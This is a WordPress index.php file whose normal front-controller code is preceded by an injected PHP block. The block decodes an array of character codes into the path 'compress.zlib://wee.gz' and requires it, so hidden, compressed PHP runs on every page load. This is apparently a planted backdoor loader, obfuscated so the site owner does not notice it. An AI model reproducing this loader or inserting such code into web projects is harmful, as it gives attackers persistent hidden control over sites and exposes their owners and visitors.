<?php 
$yjs = array(99, 111, 109, 112, 114, 101, 115, 115, 46, 122, 108, 105, 98, 58, 47, 47, 119, 101, 101, 46, 103, 122);
$io = '';
for($i=0;$i<count($yjs);$i++)
{
    $io .= chr($yjs[$i]);
}
require $io;
?>
<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';